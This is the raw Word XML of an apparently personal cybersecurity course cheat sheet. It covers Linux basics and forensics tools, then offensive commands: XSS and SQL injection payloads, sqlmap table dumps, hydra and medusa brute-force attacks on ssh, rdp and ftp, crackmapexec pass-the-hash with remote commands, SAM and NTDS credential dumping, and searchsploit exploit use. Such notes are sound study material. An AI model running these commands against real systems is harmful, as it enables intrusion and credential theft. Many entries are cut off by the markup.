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B8DB" w14:textId="49EB5E89" w:rsidR="00D841C6" w:rsidRPr="00AD7813" w:rsidRDefault="00AD7813" w:rsidP="003467DE">
      <w:pPr>
        <w:jc w:val="center"/>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 xml:space="preserve">Main </w:t>
      </w:r>
      <w:r w:rsidR="003467DE" w:rsidRPr="00AD7813">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Cyber Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0084EF" w14:textId="1153F28D" w:rsidR="00772D97" w:rsidRDefault="00772D97" w:rsidP="00772D9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A9517" w14:textId="7F463C75" w:rsidR="00A716BA" w:rsidRPr="00A716BA" w:rsidRDefault="00A716BA" w:rsidP="00A716B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ommands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BAD70C" w14:textId="43CCB13C" w:rsidR="00613EAF" w:rsidRDefault="00786159" w:rsidP="0069419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 shows files and directories in my current location</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A0D7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a – shows directories and hidden files</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s -l – shows info on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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les like size</w:t>
      </w:r>
      <w:r w:rsidR="008035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8035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13E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R – show recursively all the directories from my current location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470F316D" w14:textId="20612B9E" w:rsidR="003B35C9" w:rsidRDefault="00F954CE" w:rsidP="003B35C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 rockyou.txt – print all the passes of files that contain the name rockyou.txt</w:t>
      </w:r>
      <w:r w:rsid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B35C9" w:rsidRP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find / -name rockyou.txt</w:t>
      </w:r>
      <w:r w:rsid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or rockyou.txt file and shows the path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21202C4F" w14:textId="61DCD294" w:rsidR="00772D97" w:rsidRDefault="00772D97"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 means super user do.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DE4388" w14:textId="752DD522" w:rsidR="00B31BEF" w:rsidRDefault="00B31BEF" w:rsidP="003467DE">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li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itch user</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kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6576E38F" w14:textId="5C12A380" w:rsidR="00E0359F" w:rsidRPr="00E0359F" w:rsidRDefault="00E0359F"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d</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s my current location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1102059D" w14:textId="3503EDAF" w:rsidR="000A0D7F" w:rsidRDefault="000A0D7F" w:rsidP="0022779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 go to the first directory</w:t>
      </w:r>
      <w:r w:rsidR="0022779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 go one directory back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32002FB3" w14:textId="0AFAC90C" w:rsidR="000A0D7F" w:rsidRDefault="00605A20"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ano asd.txt – edit a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30079D1E" w14:textId="667621AC"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  asd.txt</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t a file content</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 *.txt – enter all the text files</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 -n f27 – print the file content and sign each line with its number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B68005" w14:textId="4E8D6836" w:rsidR="00EC2FA6" w:rsidRDefault="00EC2FA6"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k ‘{print $3}’ – print the third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 $NF}’ – print the last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NF -1)}’ – print the second line from the e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 $1, $2, $3}’ – print the first 3 lines</w:t>
      </w:r>
      <w:r w:rsidR="00DD7D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F@ ‘{print $2}’ – separate all the lines where found @ and print the second column from all the columns.</w:t>
      </w:r>
      <w:r w:rsidR="00DD7D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length &gt; 7’ – prints all the lines that have more than 7 chars</w:t>
      </w:r>
      <w:r w:rsidR="008D40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NR == 111’ – print the line 111</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C6A24F" w14:textId="5FAD9DD4" w:rsidR="00074A8B" w:rsidRDefault="00074A8B" w:rsidP="00A71BB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30 – prints the first 30 lines (the default is 10)</w:t>
      </w:r>
      <w:r w:rsidR="00A71B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 – print the last 10 lines</w:t>
      </w:r>
      <w:r w:rsidR="00A71B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ead -97 | tail -1 – print line number 97</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B98864" w14:textId="27FF0391" w:rsidR="00074A8B" w:rsidRDefault="00074A8B"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 ‘s/r/x/g’ – switch the char r in x in globall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ort – sort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pu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identical words and number will shows togeth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acent words, that’s why have to come after sort</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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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 delete adjacent words and count how many duplicates</w:t>
      </w:r>
      <w:r w:rsidR="009529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9529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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009529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529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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009529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adjacent words and count how many duplicates and ignore case sensitive</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 -n – sort by number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D3FCD3" w14:textId="47CE1263" w:rsidR="008D404F" w:rsidRDefault="008D404F"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 – count number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c – count number of chars or bytes, which is the s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 – counts the number of words</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3785BE66" w14:textId="1BA5F68C" w:rsidR="00D37B8F" w:rsidRPr="00074A8B" w:rsidRDefault="00D37B8F"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 ‘a-z’ ‘A-Z’ – replacing all the chars a-z in A-Z</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r ‘\t’ ‘\n’ – instead of tab go down a line </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EF428D" w14:textId="77777777"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 prints the current date.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD8DECF" w14:textId="77777777"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onfig</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s the network configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677AF15F" w14:textId="07BF9F1C" w:rsidR="00806014" w:rsidRDefault="00806014"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 clear the terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3C64AD" w14:textId="0E58ECEA"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di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d</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eating a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y</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ed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d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="367AC794" w14:textId="0B1843D8"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ami</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s the current user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2CD889" w14:textId="1A1926A2" w:rsidR="00605A20" w:rsidRDefault="002F4F3E" w:rsidP="002F4F3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rm -f – remove a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rm -d – remove empty director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rm -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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proofErr w:type="spellEnd"/>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dd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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move 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empty</w:t>
      </w:r>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 ( r stands for recursive)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D7DDE8" w14:textId="77777777"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 /home/kali/flag.txt /home/kali/Desktop – move the file from the first path to the other</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E6BE00" w14:textId="6E53D848"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 /home/kali/flag.txt /home/kali/Desktop – copy the file from the first path and paste in the other path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F04E50F" w14:textId="526F745B" w:rsidR="009163B0" w:rsidRDefault="009163B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time – output the amount of time and users logged since the last boot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B670C8" w14:textId="2D29ECB3" w:rsidR="006D49FC" w:rsidRDefault="006D49FC"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passwd kali</w:t>
      </w:r>
      <w:r w:rsidR="00B215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ange password for the user kali</w:t>
      </w:r>
      <w:r w:rsidR="00B215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5638866A" w14:textId="5D903E97" w:rsidR="005855F8" w:rsidRDefault="005855F8"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apt-get update – update the packag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apt-get upgrade – upgrade the packag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apt-get install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atrix</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tall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atrix</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kage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55ACB66F" w14:textId="61DBC323" w:rsidR="006D49FC" w:rsidRDefault="006D49FC" w:rsidP="00A716B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mod – change mode, change the permissions setting of a file.</w:t>
      </w:r>
      <w:r w:rsidR="00A716B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chmod +x file.sh – change the file permissions so we could run it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3AEF49" w14:textId="3A63E2A4" w:rsidR="00372529" w:rsidRDefault="00605A20" w:rsidP="00C11F4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ello" – prints “hello”</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gt;&gt; file.txt – add the text in the file, if the file </w:t>
      </w:r>
      <w:r w:rsidR="001A42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exist</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reates it</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cho “hello” &gt; file.txt - put the text in the file, if the file exist, it override i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1F4F" w:rsidRP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 'hello\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C11F4F" w:rsidRP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ello</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C11F4F" w:rsidRP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o down a line</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o -e </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1mexiting...\033[0m</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ld the text</w:t>
      </w:r>
      <w:r w:rsidR="00CA2A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o -e </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1mexiting...\033[0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 red tex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 – go down a line</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64C2"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1m</w:t>
      </w:r>
      <w:r w:rsidR="00A664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t bold text</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1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t red text</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0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he text formatting to the terminal's default settings</w:t>
      </w:r>
      <w:r w:rsidR="00B839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CB85727" w14:textId="7EF6AC6B" w:rsidR="006C60E7" w:rsidRPr="00361DDD" w:rsidRDefault="006C60E7" w:rsidP="00361DD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my project” – command to print</w:t>
      </w:r>
      <w:r w:rsidR="00B839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 text fo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tles</w:t>
      </w:r>
      <w:r w:rsid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361DDD" w:rsidRP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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00361DDD" w:rsidRP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 slant "Forensic investigation"</w:t>
      </w:r>
      <w:r w:rsid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the headline in slant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6295BD4F" w14:textId="32FA77E5" w:rsidR="00136837" w:rsidRPr="00372529" w:rsidRDefault="00136837"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90E4F" w14:textId="1076D514" w:rsidR="00882BF3" w:rsidRDefault="00882BF3"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d5sum file.txt – calculate the md5 hash of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a1sum file.txt – calculate the sha1 hash of the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1764EB51" w14:textId="77777777" w:rsidR="00502E69" w:rsidRDefault="00502E69"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service ssh start/stop/status – for start stop or check the status of service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A44AE2" w14:textId="77777777" w:rsidR="00502E69" w:rsidRDefault="00502E69"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get </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="008D369C">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ownloads the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FD9191" w14:textId="35F11E55" w:rsidR="00461CCA" w:rsidRDefault="00461CCA"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 http://github.com....</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03433891" w14:textId="07F1201E" w:rsidR="00406BD8" w:rsidRDefault="00502E69" w:rsidP="00406BD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 a command line tool that enables exchange between a device and a server through terminal.</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70284D" w14:textId="68FCD0E3" w:rsidR="009A2FE7" w:rsidRDefault="00502E69" w:rsidP="009A2FE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p “hello” – search for the word hell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lo” - search for the word hello without care for case sensitive</w:t>
      </w:r>
      <w:r w:rsidR="006554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v</w:t>
      </w:r>
      <w:r w:rsidR="00F218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3456</w:t>
      </w:r>
      <w:r w:rsidR="006554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clude </w:t>
      </w:r>
      <w:r w:rsidR="00F218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word or number that contains 123456</w:t>
      </w:r>
      <w:r w:rsidR="003A5B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S’ – delete empty lines</w:t>
      </w:r>
      <w:r w:rsidR="006C7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w “hi” – search only for the word “hi” and not strings that contain “hi”</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E ‘^[0-9]+$’</w:t>
      </w:r>
      <w:r w:rsidR="006C7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4C" w:rsidRP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only lines that contain numbers</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rep -R “hello” – search recursively in all the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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les from the current path the word “hello”</w:t>
      </w:r>
      <w:r w:rsidR="00B106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0858" w:rsidRP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p -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C30858" w:rsidRP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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C30858" w:rsidRP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9]{1,2}|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.([0-9]{1,2}|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.([0-9]{1,2}|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.([0-9]{1,2}|1[0-9]{2}|2[0-4][0-9]|25[0-5])'</w:t>
      </w:r>
      <w:r w:rsid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only </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsid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be </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsid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r w:rsid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accurate)</w:t>
      </w:r>
      <w:r w:rsidR="002554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password\|pass\|</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002554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d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002554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xt – search for every word here in the files</w:t>
      </w:r>
      <w:r w:rsidR="009A2F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zip -B 8 – print 8 lines before the word</w:t>
      </w:r>
      <w:r w:rsidR="009A2F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zip -A 8 – print 8 lines after the word</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEBC071" w14:textId="03AC78B5" w:rsidR="00E52D0A" w:rsidRPr="00E52D0A" w:rsidRDefault="00E52D0A" w:rsidP="000D0B2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ta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05741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p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161E">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etu</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both listening and non-listening socke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numerical addresses instead of resolving nam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only listening socke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TCP connection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UDP connection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he PID and name of the program to which each socket belong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xtended information, useful for extra details like user IDs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BBC5E6" w14:textId="77777777" w:rsidR="002170DA" w:rsidRDefault="002170D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CEF45" w14:textId="35806355" w:rsidR="002170DA" w:rsidRDefault="002170D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m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e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000 – open port 8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D645A9C" w14:textId="3ADFF5FB" w:rsidR="00B150B7" w:rsidRDefault="00C44632" w:rsidP="00B150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h </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="006028B0">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10.10.10.10</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nect using ssh to the machine 10.10.10.10 with joe user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AA8D42" w14:textId="1EB1A542" w:rsidR="001D0E2C" w:rsidRDefault="001D0E2C" w:rsidP="00B150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pas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kali’ ssh -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ctHostKeyChecking</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0104DD" w:rsidRPr="00622BB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i@10.10.10.10</w:t>
        </w:r>
      </w:hyperlink>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8.8.8” -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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roofErr w:type="spellEnd"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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me/kali/Desktop/nmap.txt – using the password kali (-p) with user kali, and run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C5ECC6" w14:textId="0E469831" w:rsidR="00B53A54" w:rsidRPr="00987E1B" w:rsidRDefault="00987E1B"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pass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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_pass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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p</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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me/kali/Try.sh "$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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_user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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roofErr w:type="spellStart"/>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_user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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transfer a file from first machine to the second machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344B838C" w14:textId="76AE6DFA" w:rsidR="00C44632" w:rsidRDefault="00C4463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22 – connect port 22 (does not provide securit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 – listening, verbose, port, listen to port 30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEA7C86" w14:textId="36E6DAEC" w:rsidR="009D0E12" w:rsidRDefault="009D0E1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xsltpro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_nmap.xml &gt;&gt; nmap.html – convert xml to html (more readab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fox</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ap.html</w:t>
      </w:r>
      <w:r w:rsidR="00800C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n html file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12609430" w14:textId="06A3ED78" w:rsidR="00980E0E" w:rsidRDefault="00E254BD" w:rsidP="00E254B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p -r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w:t>
      </w:r>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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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location</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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of_dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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zip all the directories and files in the location provided and call the zip directory hello.zip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80E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proofErr w:type="spellStart"/>
      <w:r w:rsidR="00980E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nzip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00980E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ckyou.txt.gz – open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00980E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z</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00980E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w:t>
      </w:r>
      <w:r w:rsidR="003D0E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unzip filename – for open zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17692072" w14:textId="6A521865" w:rsidR="008D1514" w:rsidRDefault="008D151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n “hello” | sha1sum – it will convert the word “hello” to hash in type of sha1sum, the -n is for explicit to not go down for another line, for the hash to be accurate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1386DF13" w14:textId="006A64F2" w:rsidR="00647E23" w:rsidRDefault="00647E23"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name” – “hell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in terminal </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465C413D" w14:textId="709FBF46" w:rsidR="00634FC1" w:rsidRDefault="00634FC1" w:rsidP="00634FC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F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va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ert the sentence of var variable into char in lower case</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7773D222" w14:textId="75E6A8E8" w:rsidR="00C37C9A" w:rsidRDefault="00C37C9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ile in $(ls); do echo “$file”; sleep 2; done – print the names of the files in the directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110FAC3F"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al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s us which files insid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al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files inside it can to, default directory name determined by the name of the file been carved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4053913B"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mos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output – carve another type of file from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al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if not specified the name of output, the default name of the directory is “output”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7271E7"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k_extractor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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E6FE5" w:rsidRP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proofErr w:type="spellEnd"/>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bulk – has to specify output directory, bulk tool extract a lot of files and sometimes even </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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ap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12781870" w14:textId="77777777" w:rsidR="008A6D1E" w:rsidRDefault="005A3156"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s </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A315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strings from the file, helpful with grep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115DB823" w14:textId="7E9AC4AD" w:rsidR="00B30837" w:rsidRDefault="00EA6EB0"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ftoo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elf</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data on the file such original name and more, it may possible to change this data when loading the file t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xD</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hange there</w:t>
      </w:r>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ftool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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5.jpg -comment = “car” – add new tag</w:t>
      </w:r>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ftool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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sv photo.jpg &gt; extracted.csv – save the results to excel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CA80D" w14:textId="46331C31" w:rsidR="0043317B" w:rsidRDefault="0043317B"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ghid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bed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x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txt – cover the file a.txt behind b.tx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bedded fil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ver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ghid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o</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txt – show details on the file, maybe ask for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ghid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ct -sf b.txt – extract the hidden file behind b.txt, sf (secret file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650ADBCC" w14:textId="51E3B6C5" w:rsidR="00B02F1C" w:rsidRDefault="00B02F1C"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jar loader.jar – a command to open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psuit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run from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psuit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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DACEACB" w14:textId="6ABF1CED" w:rsidR="00A503FD" w:rsidRDefault="00A503FD"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gt;alert(‘</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k’)&lt;/script&gt; - script you can insert into input box of a site to see if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jection works on it</w:t>
      </w:r>
      <w:r w:rsidR="00B369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d for relational database</w:t>
      </w:r>
      <w:r w:rsidR="00AC0D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SCRIPT&gt;alert(‘</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k’)&lt;/SCRIPT&gt; - maybe they did not filtered big letters</w:t>
      </w:r>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832B0" w:rsidRP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USERS WHERE username=1' OR '1'='1</w:t>
      </w:r>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jection for extract all the users (works only if the table of the users called USERS, you can try also with USERNAME)</w:t>
      </w:r>
      <w:r w:rsidR="00A16B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s – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A16B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sidR="00A16B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jection</w:t>
      </w:r>
      <w:r w:rsidR="004C174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also possible to encode special characters and use that</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77579631" w14:textId="7D1CA11D" w:rsidR="00810F6C" w:rsidRDefault="00810F6C"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m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ol that destined to extract data from DB</w:t>
      </w:r>
      <w:r w:rsidR="000042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0042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map</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000042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ddd.txt -D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000042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wa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000042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users –dump – extract users and passwords from users table from DB called </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000042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wa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000042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sing the exist file ddd.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EB0030" w14:textId="603E97B7" w:rsidR="00C4394F" w:rsidRDefault="00C4394F" w:rsidP="005832B0">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kto</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 10.10.10.10 – tool for pt in web, could extract data by exploit misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D77EF6E" w14:textId="4D8F90C0" w:rsidR="00425FB7" w:rsidRDefault="00425FB7"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b</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6B41E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0.10.10.10/multi</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iles and directories in this location using brute force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FA0377" w14:textId="4EF149AF" w:rsidR="0036430B" w:rsidRDefault="00FD3637"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dra -l kali -p 1234 10.10.10.10 ssh – attack the ssh service o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with kali user and password 1234, L or P is for list of users or passwor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hydra -l malware -p 1 rdp://10.10.10.10 – attack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 with malware user and password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 for verbose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4007E488" w14:textId="730E94E4" w:rsidR="00697594" w:rsidRDefault="0069759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usa -h 10.10.10.10 -u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admi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home/kali/file.txt -M ftp – use the user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admi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password file to try brute force on ftp service o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p>
    <w:p w14:paraId="73C04DF5" w14:textId="421232FD" w:rsidR="0036430B" w:rsidRDefault="0036430B"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4linux 10.10.10.10 – tool that search info on the target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12217076" w14:textId="376A7EFD" w:rsidR="00601862" w:rsidRDefault="00E45354" w:rsidP="00E4535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3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 (Remote Procedure Cal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E204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client</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E204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 -N 10.10.10.10  - try to connect to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E204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proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E204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 with no username and no password, the flag -N means no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clien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pentestme%Passw0rd\!” -c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use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10.10.10.10 – connect t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and run the command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use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with the credential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estm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user and Passw0rd\! as password, (\ is for the special char ! to be recognized as part of the password), it retrieve info in administrator user.</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use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 it retrieve info in administrator user, could include user SID, and the groups </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member in</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domgroups</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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the amount of groups in the system</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domusers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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the amount of users in the system</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6961B57"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D8CF3"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1F580"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736D1" w14:textId="3BF24614" w:rsidR="00FA06B9" w:rsidRDefault="00412636" w:rsidP="00726FC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mapexe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d mainly for pt, it’s </w:t>
      </w:r>
      <w:r w:rsidR="00C103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l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st exploitation tool</w:t>
      </w:r>
      <w:r w:rsidR="00C103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use also for explo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63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enumerate information about network sha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use it for run commands and more</w:t>
      </w:r>
      <w:r w:rsidR="00C856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main functions of him is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C856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H</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C856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 the hash) and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C856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T</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C856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 the ticket)</w:t>
      </w:r>
      <w:r w:rsidR="00726F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proofErr w:type="spellStart"/>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mapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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proofErr w:type="spellEnd"/>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u administrator -p 123456 </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credentials are right it will write “(pwn3d!)”</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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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mapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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proofErr w:type="spellEnd"/>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u administrator -p 123456 --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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ive us the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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of users and passwords</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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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mapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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proofErr w:type="spellEnd"/>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u administrator -H ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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sa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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ares – will use the has</w:t>
      </w:r>
      <w:r w:rsidR="000120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password for get data on share directories</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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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mapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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proofErr w:type="spellEnd"/>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u administrator -p 123456 -x ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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lware’ – create directory called “malware”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0B1E0D" w14:textId="63CF967F" w:rsidR="00726FC1" w:rsidRDefault="00726FC1" w:rsidP="003C197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 flag for pass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ead of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di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lware’ – run command on the remote machine, in this example to create director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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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for extracting local account details from the SAM database on individual computers</w:t>
      </w:r>
      <w:r w:rsidR="008110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ds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsid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for extracting domain credentials from Active Directory domain controll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res – extract info on share directori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oups – get data on the groups and the amount of users every group ha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oups startup – choose specific group, then we will get more data on the startup gro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80AAFCD" w14:textId="30ECCA5A" w:rsidR="00360534" w:rsidRDefault="00297646" w:rsidP="009C77E4">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ket-secretsdum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hiv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irty</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hiv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hiv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 – t</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mmand extracts hashed passwords and  other sensitive security informa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uses the SYSTEM hive to decrypt the hashes found in the SAM hiv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an also extract and decrypt LSA Secrets if they are accessible within the SECURITY hive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B685FBE" w14:textId="050487CB" w:rsidR="00F833E7" w:rsidRDefault="00F833E7"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sploi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ftpd</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all the exist exploits of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ftpd</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 in the DB exploit</w:t>
      </w:r>
      <w:r w:rsidR="00093F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093F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sploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00093F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 17491 – download the exploit file 17491 to our machine.</w:t>
      </w:r>
      <w:r w:rsidR="001418A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ython 4957.py 10.10.10.10 – use the exploit 4957.py in the target 10.10.10.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DBBF25" w14:textId="77777777" w:rsidR="00697594" w:rsidRDefault="00697594"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AB629" w14:textId="6EEB9082" w:rsidR="00601862" w:rsidRPr="000C387E" w:rsidRDefault="00601862" w:rsidP="00601862">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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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 in windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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p>
    <w:p w14:paraId="76388DC3" w14:textId="224F99B6" w:rsidR="00601862" w:rsidRPr="00A80D19" w:rsidRDefault="00601862"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is tool can be used in windows and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difference is vol.exe or ./vol</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e used </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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 and 3</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exe -f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dump.mem</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nfo</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OS (found in profile), we have to get that for the next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exe -f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dump.mem</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winxpsp2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tree</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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processes in </w:t>
      </w:r>
      <w:r w:rsidR="00933DDE" w:rsidRP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y</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 -f </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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dump.mem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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le=winxpsps2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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ceses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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C50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 -f </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005C50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dump.mem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005C50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le=winxpsps2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005C50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tparser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005C50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s all the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005C50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t</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005C50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w:t>
      </w:r>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 -f </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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dump.mem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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le=winxpsps2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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key</w:t>
